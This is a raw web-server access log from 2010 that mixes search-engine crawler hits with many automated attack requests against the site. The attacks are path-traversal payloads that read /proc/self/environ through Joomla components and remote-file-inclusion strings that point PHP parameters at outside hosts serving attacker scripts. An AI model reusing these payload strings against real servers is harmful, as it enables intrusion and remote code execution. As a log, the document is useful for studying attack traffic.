77.221.145.35 - - [02/Sep/2010:11:41:12 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:41:16 -0700] "GET /logs/access_080827.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:41:21 -0700] "POST /logs/access_100526.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:22 -0700] "GET /megumi/sedona/2008-11-11/025.CR2 HTTP/1.1" 200 2752512 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:23 -0700] "GET /megumi/sedona/2008-11-11/026.CR2 HTTP/1.1" 200 2818048 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:23 -0700] "GET /megumi/sedona/2008-11-11/027.CR2 HTTP/1.1" 200 2752512 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:25 -0700] "GET /megumi/sedona/2008-11-11/028.CR2 HTTP/1.1" 200 2752512 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:41:26 -0700] "GET /logs/access_080805.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:27 -0700] "GET /megumi/sedona/2008-11-11/030.CR2 HTTP/1.1" 200 2686976 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:27 -0700] "GET /megumi/sedona/2008-11-11/029.CR2 HTTP/1.1" 200 2818048 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:27 -0700] "GET /megumi/tambo/ HTTP/1.0" 200 797 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:41:28 -0700] "GET /megumi/tambo/mm2k9/ HTTP/1.1" 200 1755 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:11:43:08 -0700] "GET /logs/access_080112.log%20%20///tools/send_reminders.php?noSet=0&includedir=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:43:20 -0700] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68604 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:43:22 -0700] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:43:22 -0700] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.834" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:43:52 -0700] "GET /logs/access_100524.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:11:43:56 -0700] "GET /logs/access_100308.log HTTP/1.0" 200 3407266 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:11:43:57 -0700] "GET /logs/access_091230.log%20%20///tools/send_reminders.php?noSet=0&includedir=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:44:02 -0700] "GET /logs/access_100516.log/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:44:11 -0700] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:44:14 -0700] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167695 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:44:31 -0700] "GET /logs/access_100530.log/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:44:33 -0700] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:44:34 -0700] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167695 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:44:37 -0700] "GET /logs/access_100610.log/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:44:40 -0700] "GET /logs/access_081227.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:44:47 -0700] "POST /logs/access_081127.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:44:49 -0700] "POST /logs/access_081127.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:44:49 -0700] "POST /logs/access_081127.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
95.108.158.231 - - [02/Sep/2010:11:44:50 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" "dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:44:51 -0700] "POST /logs/access_081127.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:44:53 -0700] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68604 "-" "libwww-perl/5.834" "dmulk.com"
64.157.4.42 - - [02/Sep/2010:11:44:53 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.2; http://dmulk.com/blog" "dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:44:54 -0700] "POST /logs/access_081127.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:44:54 -0700] "POST /logs/access_081127.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:44:55 -0700] "POST /logs/access_081127.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:45:08 -0700] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:45:12 -0700] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:45:14 -0700] "GET /logs/access_100516.log/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:45:14 -0700] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:45:15 -0700] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167695 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:45:25 -0700] "GET /logs/access_100610.log/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:45:33 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:45:42 -0700] "GET /logs/access_100516.log/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:45:43 -0700] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:45:44 -0700] "GET /logs/access_100616.log/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:45:45 -0700] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167695 "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:45:47 -0700] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:45:49 -0700] "POST /logs/access_100526.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:45:49 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:11:45:55 -0700] "POST /logs/access_100305.log%20%20/fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:11:45:55 -0700] "POST /logs/fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:11:45:55 -0700] "POST /fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:46:07 -0700] "GET /logs/access_100524.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:46:21 -0700] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "dmulk.com"
174.132.235.162 - - [02/Sep/2010:11:46:23 -0700] "GET /logs/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.132.235.162 - - [02/Sep/2010:11:46:23 -0700] "GET /logs/access_080313.log/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.132.235.162 - - [02/Sep/2010:11:46:24 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 200 68499 "-" "Mozilla/5.0" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:46:30 -0700] "GET /logs/access_100820.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:46:31 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68481 "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:46:32 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:46:50 -0700] "GET /logs/access_081227.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:46:56 -0700] "GET /logs/access_100820.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:47:01 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68481 "-" "libwww-perl/5.76" "www.dmulk.com"
69.10.136.189 - - [02/Sep/2010:11:47:13 -0700] "POST /logs/access_091025.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.10.136.189 - - [02/Sep/2010:11:47:13 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.10.136.189 - - [02/Sep/2010:11:47:13 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:47:24 -0700] "GET /logs/access_100610.log/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:47:28 -0700] "GET /logs/access_100530.log/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:47:29 -0700] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
69.10.136.189 - - [02/Sep/2010:11:47:30 -0700] "POST /logs/access_100209.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:47:31 -0700] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167695 "-" "libwww-perl/5.810" "www.dmulk.com"
95.108.158.231 - - [02/Sep/2010:11:47:34 -0700] "GET / HTTP/1.1" 200 68345 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" "dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:47:49 -0700] "GET /logs/access_100610.log/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:48:21 -0700] "POST /logs/access_081025.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:48:23 -0700] "GET /logs/access_100516.log/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:48:24 -0700] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:48:26 -0700] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167695 "-" "libwww-perl/5.810" "www.dmulk.com"
217.212.224.181 - - [02/Sep/2010:11:49:15 -0700] "GET /minamijewelry/html/kids.html HTTP/1.0" 200 19770 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:49:31 -0700] "GET /logs/access_081019.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:49:39 -0700] "GET /logs/access_091206.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:49:42 -0700] "GET /logs/access_100616.log/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:49:58 -0700] "POST /logs/access_100526.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:49:58 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:11:49:58 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:50:49 -0700] "GET /logs/access_091230.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:51:49 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:51:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:51:59 -0700] "GET /logs/access_081019.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:52:01 -0700] "POST /logs/access_080316.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:52:03 -0700] "POST /logs/access_100806.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:52:04 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:52:04 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:52:04 -0700] "GET /logs/access_091206.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:52:08 -0700] "POST /logs/access_100806.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:52:08 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:52:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:52:34 -0700] "GET /logs/access_100806.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:52:37 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68481 "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:52:38 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:52:48 -0700] "POST /logs/access_100826.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:52:55 -0700] "POST /logs/access_100826.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:53:20 -0700] "GET /logs/access_080827.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:54:15 -0700] "GET /logs/access_100726.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:54:17 -0700] "POST /logs/access_081025.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:54:17 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68481 "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:54:22 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:54:35 -0700] "GET /logs/access_100726.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:11:54:36 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68481 "-" "libwww-perl/5.76" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:55:15 -0700] "GET /logs/access_080827.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:55:34 -0700] "GET /logs/access_080825.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:56:18 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68551 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:56:20 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:56:22 -0700] "GET /logs/access_100110.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:11:56:22 -0700] "GET /logs/access_081010.log HTTP/1.0" 200 4954020 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.0.81.185 - - [02/Sep/2010:11:56:22 -0700] "GET /logs//sources/join.php?FORM[url]=http://127.0.0.1/r0x.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
87.0.81.185 - - [02/Sep/2010:11:56:23 -0700] "GET /sources/join.php?FORM[url]=http://127.0.0.1/r0x.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:56:41 -0700] "GET /logs/access_080825.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:56:57 -0700] "GET /logs/access_100410.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.87.252.58 - - [02/Sep/2010:11:58:06 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/xml/media-rss.php HTTP/1.1" 200 7897 "-" "Apple-PubSub/65.20" "dmulk.com"
89.202.127.4 - - [02/Sep/2010:11:58:14 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "libwww-perl/5.836" "dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:58:15 -0700] "GET /logs/access_100516.log/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
